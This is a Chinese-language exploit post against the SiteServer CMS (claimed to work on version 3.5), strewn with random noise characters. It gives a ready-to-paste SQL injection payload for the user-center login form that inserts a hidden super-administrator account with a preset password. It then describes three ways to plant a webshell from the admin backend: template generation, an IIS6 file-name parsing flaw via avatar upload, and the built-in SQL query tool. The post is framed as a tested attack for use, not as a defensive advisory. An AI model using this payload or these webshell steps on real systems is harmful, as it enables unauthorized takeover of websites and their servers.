经测试秒杀最新的3.5版. m1 V7 o! N3 ~, x9 g. I' m
9 P! q, Z/ f" g/ |stieserver官网:www.siteserver.cn0 a5 A1 l0 Q8 `
/ p7 X1 _- P+ b2 I1 Z . T$ }4 @# @, W/ A5 }: a, l/ o
* \' x1 S: a7 o: w% K+ U& B
EXP:
/ Y$ G2 x- G8 v, F2 Y% [& W4 S& s, b: j# G5 E
直接访问UserCenter/login.aspx: N% o: m$ C: o6 x& j3 {4 }
$ n. {- X. l1 N" Y; T: _( ~0 E
% G$ p+ t' l: @1 f% k* r
9 K2 |5 t% y6 S* Q# J: k, n- ], j用户名处输入:
1 p) x0 p+ J8 l% r4 J$ K' G4 D0 ]! h ~& _
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--6 O/ r7 {* r% _; p8 X* T
) \( B, H1 c N; _4 P( p# P
3 W# @9 j% t$ w1 z( ]+ N
4 @+ _; E( H* l6 s! P' K- P- r7 C: Z
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。- c6 ^! Z6 f* y. ~
, ]8 m! G2 ~" n; @
3 C" ~, _1 B& M) E+ P# z4 E' N" X! ^1 E' l3 E: T6 [9 |
之后再访问后台SiteServer/login.aspx用插入的用户登陆7 I- P0 {, A6 N
0 ^6 _' W6 l$ e) B/ N " }- m/ I& i% r4 }+ i4 E
3 c# v$ W5 j) M+ P7 z, N) v8 e- P后台拿webshell的三种方法:
a7 g5 r0 d# ~" i0 ^- k
1 k4 ~$ z1 ]$ v* v% R. B0 o一、
; y4 U- v7 m0 D2 H2 H2 T3 d
) A5 b# P" \# X1 {# f: G站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
. W6 J6 [" s6 m* Y" c6 s: R% X$ Q
二、
' w3 |, ~# u, V- x; |, v+ E8 t+ Z" e" j1 Y$ K; Q: H
成员权限-》添加用户-》用户名为:1.asp6 P$ r7 ]+ _ `! m- ^) n
& b; F) ^( f8 Z2 ~, T' Rhttp://127.0.0.1/usercenter/7 f( p& A. g4 F7 T# M5 y
" G9 x1 L9 f& T* y2 M2 S1 j$ B
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
3 D. z2 s& @' \: \8 s7 v$ E( ?) V+ j6 Y$ f$ [/ Q3 N
(ps:后台添加用户时不会验证是否含有非法字符)
* L- @3 C, \( v9 K7 W) R: A. Z3 b0 B: p* @
三、, u4 G( n! @9 H2 I" W4 @
9 I" k' |+ x, I$ E4 d E( _2 ?
系统工具-》实用工具-》机器参数查看
7 M/ w7 o6 ]! }9 u可以看到数据库类型、名称,WEB路径; a; q( q, q7 o' z
; ^) s: @. c6 z1 [系统工具-》数据库工具-》SQL语句查询
# ?/ f `( n+ ^- |9 l这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。 c2 c0 X) Y" C2 k* h4 g9 H
2 C% Z. ^+ y4 c- O: [5 b
|